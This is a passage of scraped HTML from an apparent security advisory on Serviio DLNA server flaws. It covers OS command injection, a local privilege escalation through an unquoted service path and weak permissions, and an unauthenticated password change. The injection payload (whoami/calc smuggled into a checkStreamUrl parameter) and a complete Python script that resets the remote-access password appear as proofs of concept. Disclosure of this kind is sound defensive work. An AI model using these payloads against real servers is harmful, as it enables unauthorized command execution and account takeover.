class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-41\"><span class=\"crayon-s\">Connection: close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-42\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-43\"><span class=\"crayon-s\">{&#8220;name&#8221;:&#8221;checkStreamUrl&#8221;,&#8221;parameter&#8221;:[&#8220;VIDEO&#8221;,&#8221;1.2.3.4&#8242;<\/span><span class=\"crayon-sy\"><\/span>&#8220;<span class=\"crayon-sy\">`<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">whoami<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">testingus3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">txt<\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-v\">calc<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-s\">&#8216;&#8221;]}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-45\"><span class=\"crayon-s\">&#8216;<\/span><span class=\"crayon-s\">&#8221;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0045 seconds] -->  <\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/serviio_calc.png\" data-slb-active=\"1\" data-slb-asset=\"1495778404\" data-slb-internal=\"0\" data-slb-group=\"3094\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3096\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/serviio_calc-300x50.png\" alt=\"\" width=\"300\" height=\"50\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/serviio_calc-300x50.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/serviio_calc-768x129.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/serviio_calc.png 904w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>Local Privilege Escalation<\/strong><br \/> Serviio Windows application suffers from an unquoted search path issue impacting the service &#8216;Serviio&#8217; as part of Serviio DLNA server solution. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.<\/p>\n<p>A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications<br \/> where it could potentially be executed during application startup or reboot. If successful, the local user\u2019s code would execute with the elevated privileges of the application.<\/p>\n<p>Serviio also suffers from improper permissions which can be used by a simple authenticated user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the &#8216;F&#8217; flag (Full) for &#8216;Users&#8217; group, for the Serviio directory and its sub-directories.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-590905ee7e65f998044273\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> C:&gt;sc qc Serviio  [SC] QueryServiceConfig SUCCESS    SERVICE_NAME: Serviio          TYPE               : 110  WIN32_OWN_PROCESS (interactive)          START_TYPE         : 2   AUTO_START          ERROR_CONTROL      : 1   NORMAL          BINARY_PATH_NAME   : C:Program FilesServiiobinServiioService.exe          LOAD_ORDER_GROUP   :          TAG                : 0          DISPLAY_NAME       : Serviio          DEPENDENCIES       : HTTP          SERVICE_START_NAME : LocalSystem    C:&gt;icacls &#8220;C:Program FilesServiiobinServiioService.exe&#8221;  C:Program FilesServiiobinServiioService.exe BUILTINUsers:(I)(F)                                                  NT AUTHORITYSYSTEM:(I)(F)                                                  BUILTINAdministrators:(I)(F)    Successfully processed 1 files; Failed processing 0 files    C:&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65f998044273-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65f998044273-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65f998044273-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65f998044273-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65f998044273-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65f998044273-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65f998044273-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65f998044273-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65f998044273-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65f998044273-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65f998044273-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65f998044273-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65f998044273-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65f998044273-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65f998044273-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65f998044273-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65f998044273-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65f998044273-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65f998044273-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65f998044273-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65f998044273-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65f998044273-22\">22<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65f998044273-1\"><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">sc <\/span><span class=\"crayon-e\">qc <\/span><span class=\"crayon-i\">Serviio<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65f998044273-2\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">SC<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">QueryServiceConfig <\/span><span class=\"crayon-e\">SUCCESS<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65f998044273-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65f998044273-4\"><span class=\"crayon-v\">SERVICE_NAME<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Serviio<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65f998044273-5\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">TYPE<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">110<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">WIN32_OWN_PROCESS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">interactive<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65f998044273-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">START_TYPE<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">AUTO_START<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65f998044273-7\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ERROR_CONTROL<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">NORMAL<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65f998044273-8\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">BINARY_PATH_NAME<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-e\">Program <\/span><span class=\"crayon-v\">Files<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">Serviio<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">ServiioService<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65f998044273-9\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">LOAD_ORDER_GROUP<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65f998044273-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">TAG<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65f998044273-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">DISPLAY_NAME<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Serviio<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65f998044273-12\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">DEPENDENCIES<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HTTP<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65f998044273-13\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">SERVICE_START_NAME<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">LocalSystem<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65f998044273-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65f998044273-15\"><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-i\">icacls<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;C:Program FilesServiiobinServiioService.exe&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65f998044273-16\"><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-e\">Program <\/span><span class=\"crayon-v\">Files<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">Serviio<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">ServiioService<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe <\/span><span class=\"crayon-v\">BUILTIN<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">Users<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">I<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">F<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65f998044273-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">SYSTEM<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">I<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">F<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65f998044273-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">BUILTIN<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">Administrators<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">I<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">F<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65f998044273-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65f998044273-20\"><span class=\"crayon-e\">Successfully <\/span><span class=\"crayon-i\">processed<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">files<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Failed <\/span><span class=\"crayon-i\">processing<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">files<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65f998044273-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65f998044273-22\"><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0035 seconds] -->  <\/p>\n<p><strong>Unauthenticated Password Modification<\/strong><br \/> Serviio suffer from unauthenticated password modification vulnerability due to improper access control enforcement of the Configuration REST API. A remote attacker can exploit this, via a specially crafted request, to change the login password for the <em>mediabrowser<\/em> protected page.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-590905ee7e662507722520\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import sys  import xml.etree.ElementTree as ET  from urllib2 import Request, urlopen    if (len(sys.argv) &lt;= 3):          print &#8216;[*] Usage: serviio_pwd.py &lt;ipaddress&gt; &lt;port&gt; &lt;newpassword&gt;&#8217;          print &#8216;[*] Example: serviio_pwd.py 10.211.55.3 23423 eagle20fox2&#8217;          exit(0)    host = sys.argv[1]  port = sys.argv[2] #default port for console is 23423, and for the mediabrowser is 23424.  lozi = sys.argv[3]    values = &#8220;&#8221;&#8221;  &lt;remoteAccess&gt;      &lt;remoteUserPassword&gt;{0}&lt;\/remoteUserPassword&gt;      &lt;preferredRemoteDeliveryQuality&gt;ORIGINAL&lt;\/preferredRemoteDeliveryQuality&gt;      &lt;portMappingEnabled&gt;true&lt;\/portMappingEnabled&gt;      &lt;externalAddress&gt;myserviio.dyndns.com&lt;\/externalAddress&gt;  &lt;\/remoteAccess&gt;&#8221;&#8221;&#8221;    put = values.format(lozi)    headers = {    &#8216;Content-Type&#8217;: &#8216;application\/xml&#8217;,    &#8216;Accept&#8217;: &#8216;application\/xml&#8217;  }  request = Request(&#8216;http:\/\/&#8217;+host+&#8217;:&#8217;+port+&#8217;\/rest\/remote-access&#8217;, data=put, headers=headers)  request.get_method = lambda: &#8216;PUT&#8217;  response_body = urlopen(request).read()  roottree = ET.fromstring(response_body)    for errorcode in roottree.iter(&#8216;errorCode&#8217;):       print &#8220;nReceived error code: &#8220;+errorcode.text    print &#8216;Password successfully changed to: &#8216;+lozi  print &#8216;Go to: http:\/\/&#8217;+host+&#8217;:23424\/mediabrowsern&#8217;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e662507722520-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e662507722520-37\">37<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ElementTree <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ET<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-3\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">urllib2 <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">Request<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">urlopen<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-5\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;[*] Usage: serviio_pwd.py &lt;ipaddress&gt; &lt;port&gt; &lt;newpassword&gt;&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-7\"><span 